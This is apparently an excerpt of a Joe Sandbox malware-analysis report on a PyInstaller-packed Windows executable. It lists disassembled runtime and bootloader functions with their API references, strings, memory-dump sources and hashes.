Part of subcall function 00007FF7691AECDC: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF7691AED44

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF7691ADE5D
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF7691AE0AB
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7691AE1B8

Strings

csm, xrefs: 00007FF7691ADE06
csm, xrefs: 00007FF7691ADE80
csm, xrefs: 00007FF7691ADD9F

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: e61afc8d21ba52cdbe611d77afa9c967b031d652e012678c684f0478f5a183c7
Instruction ID: 3de6a84cb46d98eb451ca9ec87a3f4b17f2614a0aad2d5357caf8b5cb3872a20
Opcode Fuzzy Hash: e61afc8d21ba52cdbe611d77afa9c967b031d652e012678c684f0478f5a183c7
Instruction Fuzzy Hash: 01D17F32A08B41CAEB28AF65A5403BDB7B0FB54788FA04136EE4D57B95DF38E941C710

Function 00007FFE13305F0A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE133063F0: RtlPcToFileHeader.KERNEL32 ref: 00007FFE13306434
Part of subcall function 00007FFE133063F0: RaiseException.KERNEL32 ref: 00007FFE1330647A

RtlPcToFileHeader.KERNEL32 ref: 00007FFE13305FA7
FindMITargetTypeInstance.LIBVCRUNTIME ref: 00007FFE13306003

Strings

Bad dynamic_cast!, xrefs: 00007FFE13306072
Access violation - no RTTI data!, xrefs: 00007FFE13305F0A, 00007FFE1330612B
Bad read pointer - no RTTI data!, xrefs: 00007FFE13306108
Attempted a typeid of nullptr pointer!, xrefs: 00007FFE133060E5

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
API String ID: 1852475696-928371585
Opcode ID: 7f6c35cefbfcfc98e88ebc0aa35afe6c2c6ede9eabcdb344d1914a97fbaad475
Instruction ID: 2d98b8da232cc3116597f5cefd4a62557a2472c79bfa4be9646a38cfaf8c31a4
Opcode Fuzzy Hash: 7f6c35cefbfcfc98e88ebc0aa35afe6c2c6ede9eabcdb344d1914a97fbaad475
Instruction Fuzzy Hash: B851B362A0DE46DAEE20CB26E4901BD6360FF64BA4F504571DAAD276BADF3CE505C304

Function 00007FFE1330E148 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1330E1BC
DName::operator+.LIBVCRUNTIME ref: 00007FFE1330E1CB
DName::operator+=.LIBVCRUNTIME ref: 00007FFE1330E2E8

Part of subcall function 00007FFE1330C3C8: DName::operator+.LIBVCRUNTIME ref: 00007FFE1330C459
Part of subcall function 00007FFE1330C3C8: DName::operator+.LIBVCRUNTIME ref: 00007FFE1330C492
Part of subcall function 00007FFE1330C3C8: DName::operator+.LIBVCRUNTIME ref: 00007FFE1330C7BB

DName::operator+.LIBVCRUNTIME ref: 00007FFE1330E26B
DName::operator+.LIBVCRUNTIME ref: 00007FFE1330E27B
DName::operator+.LIBVCRUNTIME ref: 00007FFE1330E325

Strings

{for , xrefs: 00007FFE1330E1F4

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: Name::operator+$Name::operator+=
String ID: {for
API String ID: 179159573-864106941
Opcode ID: edc966f78679f2c80b6a90da374f91d2d358e76260b44eb27b7c84d8a506cb89
Instruction ID: 02bc4ae01f6feb34610a84400f8f8328b14b6835919ffc7dfbfe76f607d78339
Opcode Fuzzy Hash: edc966f78679f2c80b6a90da374f91d2d358e76260b44eb27b7c84d8a506cb89
Instruction Fuzzy Hash: 4E518D72A08E859DE7019F26C4413EC77A4EB24768F4080B1EA6C27BA6DF7CD650C318

Function 00007FF7691A7C40 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 116COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF7691A3834), ref: 00007FF7691A7CE4
CreateDirectoryW.KERNEL32(?,?,FFFFFFFF,00007FF7691A3834), ref: 00007FF7691A7D2C

Part of subcall function 00007FF7691A7E10: GetEnvironmentVariableW.KERNEL32(00007FF7691A365F), ref: 00007FF7691A7E47
Part of subcall function 00007FF7691A7E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7691A7E69

Part of subcall function 00007FF7691B7548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B7561

Part of subcall function 00007FF7691A26C0: MessageBoxW.USER32 ref: 00007FF7691A2736

Strings

LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF7691A7D5E
_MEI%d, xrefs: 00007FF7691A7CF2
TMP, xrefs: 00007FF7691A7C7C, 00007FF7691A7D83
LOADER: failed to set the TMP environment variable., xrefs: 00007FF7691A7CBC
TMP, xrefs: 00007FF7691A7CA2

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 740614611-1339014028
Opcode ID: 41794429c51d27e0df7a21877b4f19c7cdf826b4f928fd21ea6cb85727b80d41
Instruction ID: 1f07de73959348c7c154c4174419d6cdd0ac35e422deaef3ae17e57a6a4893d9
Opcode Fuzzy Hash: 41794429c51d27e0df7a21877b4f19c7cdf826b4f928fd21ea6cb85727b80d41
Instruction Fuzzy Hash: 4C416011F09642C1EA28BF61B9552F9D271AF45B80FE44032ED1E57BDAEE3CEA05C760

Function 00007FFE133068AC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FFE13306A6B,?,?,00000000,00007FFE1330689C,?,?,?,?,00007FFE133065E5), ref: 00007FFE13306931
GetLastError.KERNEL32(?,?,?,00007FFE13306A6B,?,?,00000000,00007FFE1330689C,?,?,?,?,00007FFE133065E5), ref: 00007FFE1330693F
wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE13306A6B,?,?,00000000,00007FFE1330689C,?,?,?,?,00007FFE133065E5), ref: 00007FFE13306958
LoadLibraryExW.KERNEL32(?,?,?,00007FFE13306A6B,?,?,00000000,00007FFE1330689C,?,?,?,?,00007FFE133065E5), ref: 00007FFE1330696A
FreeLibrary.KERNEL32(?,?,?,00007FFE13306A6B,?,?,00000000,00007FFE1330689C,?,?,?,?,00007FFE133065E5), ref: 00007FFE133069B0
GetProcAddress.KERNEL32(?,?,?,00007FFE13306A6B,?,?,00000000,00007FFE1330689C,?,?,?,?,00007FFE133065E5), ref: 00007FFE133069BC

Strings

api-ms-, xrefs: 00007FFE13306951

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
String ID: api-ms-
API String ID: 916704608-2084034818
Opcode ID: 45bb9c456b18d615664943834e4003b355ea3ec7f5874fc1f64106649d67ca5c
Instruction ID: b7aae946a8d91d241258989ff18183624e8fbc637ecef721bb62c4943a7a1a7f
Opcode Fuzzy Hash: 45bb9c456b18d615664943834e4003b355ea3ec7f5874fc1f64106649d67ca5c
Instruction Fuzzy Hash: 0231C421B1AE4299EE11DB0799002B9A394FF64BB0F294575DD7D2B7A9EF3CE144C308

Function 00007FFE133025E8 Relevance: 12.1, APIs: 8, Instructions: 148COMMON

Download Yara Rule

APIs

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE133026A0
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE133026BE
__AdjustPointer.LIBCMT ref: 00007FFE133026FF
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1330270C
__AdjustPointer.LIBCMT ref: 00007FFE13302748
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1330275D
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE133027A2
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE133027A9

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: abort$AdjustPointer
String ID:
API String ID: 1501936508-0
Opcode ID: d386002f74db6febb42ef9b4bac4e43e25a554ab645870d9c47f674d5a84533b
Instruction ID: d500719622b797de94648a33a44b72416860f68811ac72ad3da824d0d9412dea
Opcode Fuzzy Hash: d386002f74db6febb42ef9b4bac4e43e25a554ab645870d9c47f674d5a84533b
Instruction Fuzzy Hash: B351D321E09E4689EAA6CB13D04463C63A4AF74FB0F0540B5EE6DA67B6DF6CE441C308

Function 00007FFE133027CC Relevance: 12.1, APIs: 8, Instructions: 148COMMON

Download Yara Rule

APIs

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE13302886
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE133028A5
__AdjustPointer.LIBCMT ref: 00007FFE133028E6
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE133028F3
__AdjustPointer.LIBCMT ref: 00007FFE1330292F
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE13302944
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE13302989
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE13302990

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: abort$AdjustPointer
String ID:
API String ID: 1501936508-0
Opcode ID: ad7bbbe6b4c289a22ae1e43e79ef4439cf3ee9b14764b2eff01f06dd25f3f236
Instruction ID: b32aa8f634e8eeee5686d8ca7137b57ea6fb95e40eb4694476f06213cda9143e
Opcode Fuzzy Hash: ad7bbbe6b4c289a22ae1e43e79ef4439cf3ee9b14764b2eff01f06dd25f3f236
Instruction Fuzzy Hash: A951D721E09E4389FAA5CB57948463CA394EF74FB1F0944B5CEADA67B5DF2CE4418308

Function 00007FFE13305520 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 132COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FFE133055E9
_local_unwind.LIBVCRUNTIME ref: 00007FFE1330568C

Strings

RCC, xrefs: 00007FFE1330556E
csm, xrefs: 00007FFE133056D0
csm, xrefs: 00007FFE13305584
MOC, xrefs: 00007FFE13305562

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: FileHeader_local_unwind
String ID: MOC$RCC$csm$csm
API String ID: 2627209546-1441736206
Opcode ID: 385ada566cdd30ad99b7ac5e1d5c8025a7264eea7c22efa234297d7bd0e399d8
Instruction ID: ee08a0d92f4298641f4ed53d2ae382b87543e4a7517ba80243e9bf94bfaf9f7c
Opcode Fuzzy Hash: 385ada566cdd30ad99b7ac5e1d5c8025a7264eea7c22efa234297d7bd0e399d8
Instruction Fuzzy Hash: F8517172E0DA168EFB609F26900137D76A0FF64BA4F141071EA6D663A5DF3CE4818B05

Function 00007FFE1330D740 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

APIs

atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE1330CE14), ref: 00007FFE1330D803
DName::DName.LIBVCRUNTIME ref: 00007FFE1330D822

Strings

void, xrefs: 00007FFE1330D786
`template-parameter, xrefs: 00007FFE1330D830

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: NameName::atol
String ID: `template-parameter$void
API String ID: 2130343216-4057429177
Opcode ID: 2821a58495c29764098872c6b010649cccddcb6c42941e500fb92a9452cac6b1
Instruction ID: 76a62267eba4e3c23af488a9991f97291b3bf2fd9791966979e339055da59c44
Opcode Fuzzy Hash: 2821a58495c29764098872c6b010649cccddcb6c42941e500fb92a9452cac6b1
Instruction Fuzzy Hash: 0A413522F08F56CCFB009BA6D8552BC23B1BB28BA8F541175DE2D26A79DF38A505C344

Function 00007FF7691ACFE8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF7691AD29A,?,?,?,00007FF7691ACF8C,?,?,?,00007FF7691ACB89), ref: 00007FF7691AD06D
GetLastError.KERNEL32(?,?,?,00007FF7691AD29A,?,?,?,00007FF7691ACF8C,?,?,?,00007FF7691ACB89), ref: 00007FF7691AD07B
LoadLibraryExW.KERNEL32(?,?,?,00007FF7691AD29A,?,?,?,00007FF7691ACF8C,?,?,?,00007FF7691ACB89), ref: 00007FF7691AD0A5
FreeLibrary.KERNEL32(?,?,?,00007FF7691AD29A,?,?,?,00007FF7691ACF8C,?,?,?,00007FF7691ACB89), ref: 00007FF7691AD113
GetProcAddress.KERNEL32(?,?,?,00007FF7691AD29A,?,?,?,00007FF7691ACF8C,?,?,?,00007FF7691ACB89), ref: 00007FF7691AD11F

Strings

api-ms-, xrefs: 00007FF7691AD08D

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
Instruction ID: d8f3b35796722d8ffef25c0141a0ed9c9db71d75a2e66361af65beb86ee0bc11
Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
Instruction Fuzzy Hash: 2131A325A1AA42C5EE19AF12B500579A3B4BF09BA0FB90536DD1D47B80EF3CE846C724

Function 00007FFE13308624 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE133086DB

Strings

void, xrefs: 00007FFE13308759
<ellipsis>, xrefs: 00007FFE13308734
,..., xrefs: 00007FFE133086A8
,<ellipsis>, xrefs: 00007FFE133086B8
..., xrefs: 00007FFE13308724

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: Name::operator+
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 2943138195-2211150622
Opcode ID: 16d5b7056506ac1aa3be62c87a897449e0af35361c1a5b370ad614f7e7c3f2e7
Instruction ID: 076c5fff74ffc01a178469f328f098d03c90abe817e8f858a146097334025b89
Opcode Fuzzy Hash: 16d5b7056506ac1aa3be62c87a897449e0af35361c1a5b370ad614f7e7c3f2e7
Instruction Fuzzy Hash: 1F414A72A08F4ACCFB018F66D8402AC7BB0BB28728F444171DA6D6637ADF3CA545C748

Function 00007FFE1330A31C Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1330A40F

Strings

int , xrefs: 00007FFE1330A38D
unsigned , xrefs: 00007FFE1330A3E3
char , xrefs: 00007FFE1330A3A5
long , xrefs: 00007FFE1330A37E
short , xrefs: 00007FFE1330A39C

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: Name::operator+
String ID: char $int $long $short $unsigned
API String ID: 2943138195-3894466517
Opcode ID: 1a667bf595c3f0eddcec5e75b1b20bf055c895b242c78c01af1086ecda962d52
Instruction ID: 73479b7d9560641004236f9dc9eae077e86501b2da49d0c88ba7b5958bf5234e
Opcode Fuzzy Hash: 1a667bf595c3f0eddcec5e75b1b20bf055c895b242c78c01af1086ecda962d52
Instruction Fuzzy Hash: 06416A72A18A56CCF7118F7AE8441BC37B1BB28764F4482B1DE2C62BB9DF389545C708

Function 00007FF7691A7B50 Relevance: 10.6, APIs: 7, Instructions: 63COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF7691A7B70
OpenProcessToken.ADVAPI32 ref: 00007FF7691A7B83
GetTokenInformation.ADVAPI32 ref: 00007FF7691A7BA8
GetLastError.KERNEL32 ref: 00007FF7691A7BB2
GetTokenInformation.ADVAPI32 ref: 00007FF7691A7BF2
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7691A7C0E
CloseHandle.KERNEL32 ref: 00007FF7691A7C26

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: 8356e17e6427c03366acad688ef96df5430cd8c67dfe58d52091e88c81740b7d
Instruction ID: 041b1a80ef0167759184ee629d728a1cc03cbf31fc9d6165fdfceecc57fa3b13
Opcode Fuzzy Hash: 8356e17e6427c03366acad688ef96df5430cd8c67dfe58d52091e88c81740b7d
Instruction Fuzzy Hash: E3212121E0CB43C1EA14AF55B44422AE3B5EB857A4FA40235DA7D43AD8DF7CD9458B10

Function 00007FF7691BA460 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7691BA46F
FlsGetValue.KERNEL32 ref: 00007FF7691BA484
FlsSetValue.KERNEL32 ref: 00007FF7691BA4A5
FlsSetValue.KERNEL32 ref: 00007FF7691BA4D2
FlsSetValue.KERNEL32 ref: 00007FF7691BA4E3
FlsSetValue.KERNEL32 ref: 00007FF7691BA4F4
SetLastError.KERNEL32 ref: 00007FF7691BA50F

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 4f1009f36f4b7e41e642a617816a0843c7a4fdcae41be86a1245b23186b7dd2e
Instruction ID: ed425afdaccad30083c56d0d0ae6538f45896da75e2566c2c7e2e7f69b4c8335
Opcode Fuzzy Hash: 4f1009f36f4b7e41e642a617816a0843c7a4fdcae41be86a1245b23186b7dd2e
Instruction Fuzzy Hash: DD213820B4C242C2FA6D7F25B655139E1B35F487B0FB84634E93E46AEEDE2CA5018761

Function 00007FF7691A29E0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF7691A342E,?,00007FF7691A3534), ref: 00007FF7691A2A14
FormatMessageW.KERNEL32(?,?,?,00007FF7691A342E), ref: 00007FF7691A2A7D
MessageBoxW.USER32 ref: 00007FF7691A2ACF

Strings

Error, xrefs: 00007FF7691A2ABE
<FormatMessageW failed.>, xrefs: 00007FF7691A2A83
%ls%ls: %ls, xrefs: 00007FF7691A2A96

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Message$ErrorFormatLast
String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
API String ID: 3971115935-1149178304
Opcode ID: 7223b30dd23a30c2aa7faf0092ff60e4697deebee1b944f1837b883079aee3ab
Instruction ID: d1a404bb48bdbd6507c22d18f3c0b7c5c183b4c218605dbdeb57b0d5c65fa8aa
Opcode Fuzzy Hash: 7223b30dd23a30c2aa7faf0092ff60e4697deebee1b944f1837b883079aee3ab
Instruction Fuzzy Hash: DF216D72608A85C2E724AF11F4402EAB3B4FB88785F900136EACD53A98DF3CD656CB50

